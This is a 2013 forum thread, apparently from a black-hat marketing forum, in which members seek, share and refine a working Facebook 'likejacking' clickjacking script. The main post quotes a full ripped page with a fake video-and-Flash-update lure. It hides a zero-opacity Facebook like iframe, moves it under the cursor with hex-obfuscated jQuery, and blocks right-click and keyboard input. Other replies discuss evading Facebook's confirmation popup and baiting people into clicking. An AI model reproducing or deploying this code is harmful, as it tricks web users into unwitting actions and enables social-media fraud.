1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[req] Working Facebook Clickjacking

Discussion in 'FaceBook' started by zx123, Oct 28, 2013.

  1. zx123

    zx123 Senior Member

    Joined:
    Feb 26, 2009
    Messages:
    1,158
    Likes Received:
    875
    Home Page:
    Someone has a working script?? That not need to 2 times the like?? I have one but it opens a popup to confirm the like
     
  2. kaylanewett

    kaylanewett Power Member

    Joined:
    Jun 8, 2013
    Messages:
    611
    Likes Received:
    547
    Location:
    NYC
    If anyone has such a script, I am looking to buy it too!
     
  3. W9go

    W9go Jr. VIP Jr. VIP Premium Member

    Joined:
    May 16, 2011
    Messages:
    3,380
    Likes Received:
    632
    Gender:
    Male
    Occupation:
    chasing girls
    Location:
    chasing girls
    suscribed .... ....
     
  4. zx123

    zx123 Senior Member

    Joined:
    Feb 26, 2009
    Messages:
    1,158
    Likes Received:
    875
    Home Page:
    If someone see it on facebook please report to me, I can decode it if obfuscated. Some days ago I ear of a fake video that uses it and a fake capthcha do the rest. But I cant find it
     
    • Thanks Thanks x 1
  5. Driezzie

    Driezzie Regular Member

    Joined:
    Mar 22, 2011
    Messages:
    334
    Likes Received:
    45
    listrank [dot] com uses it I believe. They spam facebook pages hard.

    other examples :

    funnie [dot] st
    lolgerms [dot] com
    epicdpic [dot] com

    Please share if you have it. Look at your mouse it shows the "hand" of a clickable link (iframe like button). Problem with older likejacking scripts is that they do this when you click multiple times : like - unlike - like - unlike - like - unlike
     
    Last edited: Oct 28, 2013
  6. racket

    racket Regular Member

    Joined:
    Jun 1, 2011
    Messages:
    206
    Likes Received:
    19
    are you guys ok?
    every domain gets confirm
    but it goes away on its own
     
  7. zx123

    zx123 Senior Member

    Joined:
    Feb 26, 2009
    Messages:
    1,158
    Likes Received:
    875
    Home Page:
    thanks man
    I already ripped the code :D and works .... now the problem is create some content that involve the people to click
     
  8. Spawnie

    Spawnie Power Member

    Joined:
    Feb 1, 2010
    Messages:
    716
    Likes Received:
    290
    Care to share?
    I was looking at the code but couldnt find it on any page...
    Or just tell which js it is then I can rip it on my own ;)
     
  9. Spawnie

    Spawnie Power Member

    Joined:
    Feb 1, 2010
    Messages:
    716
    Likes Received:
    290
    Got it - but its not working better than the others that are arround...
     
  10. samfriend

    samfriend Newbie

    Joined:
    Oct 19, 2013
    Messages:
    43
    Likes Received:
    8
    send me the script, i will take a look and give u suggestion =)
     
  11. GodLy

    GodLy Jr. VIP Jr. VIP

    Joined:
    Feb 15, 2012
    Messages:
    899
    Likes Received:
    114
    Occupation:
    Web developer
    Location:
    China, HK
    Yeah someone working on it... :)
     
  12. Driezzie

    Driezzie Regular Member

    Joined:
    Mar 22, 2011
    Messages:
    334
    Likes Received:
    45
    yes please share it. The main problem is that it does this : like - unlike - like - unlike
    This could hurt your facebook page pretty bad. It needs to be disguised or working with cookies so it doesn't show up again.

    Isn't there something like this :

    When you have the official facebook likebox on your website (most of us do) it leads the mouse to the like box (X en Y screen settings?) and clicks it instantly when the first page is loaded and then disappears.
     
    Last edited: Oct 29, 2013
  13. d4mn1t

    d4mn1t Newbie

    Joined:
    Feb 15, 2012
    Messages:
    18
    Likes Received:
    5
    You can't control mouse clicks unless user self clicks on it
     
  14. fcampus

    fcampus Newbie

    Joined:
    Oct 29, 2013
    Messages:
    20
    Likes Received:
    0
    You can see for example here in this brazilian website --> portalnoticiasr9 (sorry i'm new just add the rest for a braziliandomain)
    a simple blog/website posted in several facebook pages who gets lots of likes because this click jacking is active in all area.

    if anyone can send me the code to try also something like this it will be great ;)
     
    Last edited: Oct 29, 2013
  15. lincher

    lincher Junior Member

    Joined:
    Jun 29, 2013
    Messages:
    156
    Likes Received:
    39
    Code:
    <html>
    
    <head>
    <meta http-equiv=Content-Type content="text/html; charset=windows-1252">
    <meta name=Generator content="Microsoft Word 15 (filtered)">
    <style>
    <!--
     /* Font Definitions */
     @font-face
    {font-family:"Cambria Math";
    panose-1:2 4 5 3 5 4 6 3 2 4;}
    @font-face
    {font-family:Calibri;
    panose-1:2 15 5 2 2 2 4 3 2 4;}
     /* Style Definitions */
     p.MsoNormal, li.MsoNormal, div.MsoNormal
    {margin-top:0cm;
    margin-right:0cm;
    margin-bottom:8.0pt;
    margin-left:0cm;
    line-height:107%;
    font-size:11.0pt;
    font-family:"Calibri","sans-serif";}
    .MsoChpDefault
    {font-family:"Calibri","sans-serif";}
    .MsoPapDefault
    {margin-bottom:8.0pt;
    line-height:107%;}
    @page WordSection1
    {size:595.3pt 841.9pt;
    margin:70.85pt 3.0cm 70.85pt 3.0cm;}
    div.WordSection1
    {page:WordSection1;}
    -->
    </style>
    
    
    </head>
    
    
    
    
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
    </script>
    <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
    
    
    <script type="text/javascript">
    function PirocaHide(){
    jQuery("div[id^=\'jonathantaioba\']").hide();
    }
    function PirocaShow(){
    jQuery("div[id^=\'jonathantaioba\']").show();
    }
    </script>
    
    
    
    
    
    
    <body lang=PT-BR>
    
    
    <div class=WordSection1>
    
    
    <p class=MsoNormal align=center style='text-align:center'><span
    style='font-size:28.0pt;line-height:107%'>Assista o Vídeo Abaixo</span></p>
    
    
    <p class=MsoNormal align=center style='text-align:center'><img width=688
    height=443 id="Imagem 1"
    src="img/image001.png"></p>
    
    
    <p class=MsoNormal align=center style='text-align:center'><img width=5
    height=5 id="Imagem 1"
    src="1.jpg"></p>
    
    
    <p class=MsoNormal align=center style='text-align:center'><u><span
    style='font-size:10.0pt;line-height:107%'>Caso não consiga visualizar o vídeo atualize
    o Adobe Flash.</span></u></p>
    <center>
    <script type="text/javascript" src="http://adsafiliados.com.br/anuncio/1283/1.js"></script>
    </center>
    
    
    <script type="text/javascript" src="http://adsafiliados.com.br/anuncio/1283/6.js"></script>
    
    
    </div>
    
    
    <div id="jonathantaioba" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
    <iframe src="http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/TirasPoderoso&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
    </div>
    
    
    
    
    
    
    
    
    <script type="text/javascript">
    jQuery(document)["\x72\x65\x61\x64\x79"](function (){$("\x23\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x74\x61\x69\x6F\x62\x61")["\x70\x61\x72\x65\x6E\x74"]()["\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65"](function (e){jQuery("\x23\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x74\x61\x69\x6F\x62\x61")["\x63\x73\x73"]({top:e["\x70\x61\x67\x65\x59"]-10,left:e["\x70\x61\x67\x65\x58"]+30});} );Piroca_hider();var Piroca_timer=setTimeout("\x50\x69\x72\x6F\x63\x61\x5F\x68\x69\x64\x65\x72\x28\x29",5000);} );function Piroca_hider(){jQuery("\x69\x6E\x70\x75\x74")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x61")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x62\x75\x74\x74\x6F\x6E")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x74\x65\x78\x74\x61\x72\x65\x61")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x2E\x72\x61\x74\x69\x6E\x67\x62\x6C\x6F\x63\x6B")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x6F\x62\x6A\x65\x63\x74")["\x6D\x6F\x75\x73\x65\x6F\x75\x74"](function (){PirocaShow();} );jQuery("\x69\x6E\x70\x75\x74")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );jQuery("\x61")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );jQuery("\x62\x75\x74\x74\x6F\x6E")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );jQuery("\x74\x65\x78\x74\x61\x72\x65\x61")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );jQuery("\x2E\x72\x61\x74\x69\x6E\x67\x62\x6C\x6F\x63\x6B")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );jQuery("\x6F\x62\x6A\x65\x63\x74")["\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72"](function (){PirocaHide();} );} ;
    </script>
    
    
    
    
    
    
    
    
    
    
    
    
    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
    
    
      ga('create', 'UA-44444222-1', 'portalnoticiasr9.com.br');
      ga('send', 'pageview');
    
    
    </script>
    
    
    
    
    
    
    </div>
    
    
    </center>
    <p>
    <p>
    <p>
    <p class=MsoNormal align=center style='text-align:center'><img width=300
    height=500 id="Imagem 5" src="img/image001.jpg"></p>
    
    
    <p class=MsoNormal align=center style='text-align:center'><img width=300
    height=500 id="Imagem 6" src="img/image002.jpg"></p>
    
    
    <center><script type="text/javascript" src="http://adsafiliados.com.br/anuncio/1283/4.js"></script></center>
    
    
    <p class=MsoNormal align=center style='text-align:center'><img width=300
    height=500 id="Imagem 7" src="img/image003.jpg"></p>
    
    
    <body oncontextmenu="return false" onkeydown="return false">
    
    
    </html>
    
    
    
    Source: http://www.portalnoticiasr9.com.br/
     
  16. GodLy

    GodLy Jr. VIP Jr. VIP

    Joined:
    Feb 15, 2012
    Messages:
    899
    Likes Received:
    114
    Occupation:
    Web developer
    Location:
    China, HK
    This is simple mouse follower... also badly done..
     
  17. Driezzie

    Driezzie Regular Member

    Joined:
    Mar 22, 2011
    Messages:
    334
    Likes Received:
    45
    Ok we can do a little twist with it to avoid the like-unlike-like-unlike: a seperate page with the script active on the background.

    Options that come up in my head :

    - pop-up script/plugin that let's you vote (thumbs up/thumbs down) on a picture (script disappears after x seconds)
    - pop-under with popular posts (script disappears after x seconds)
    - iframe a page in the sidebar with a hot/funny picture (script disappears after x seconds)
     
  18. GodLy

    GodLy Jr. VIP Jr. VIP

    Joined:
    Feb 15, 2012
    Messages:
    899
    Likes Received:
    114
    Occupation:
    Web developer
    Location:
    China, HK
    Good ideas, also it can be done on custom site elements, like on play button, or next... :)
     
  19. zx123

    zx123 Senior Member

    Joined:
    Feb 26, 2009
    Messages:
    1,158
    Likes Received:
    875
    Home Page:
    the problem is that facebook open a popup to confirm the

    I created this script (check the source code)
    Code:
    http://myalbum.de.vc/3r7krj/
    in this way double click not remove the like, but the problem is the facebook confirm popup
     
    Last edited: Oct 30, 2013
  20. GodLy

    GodLy Jr. VIP Jr. VIP

    Joined:
    Feb 15, 2012
    Messages:
    899
    Likes Received:
    114
    Occupation:
    Web developer
    Location:
    China, HK
    One of the problem is that you don't have APP id.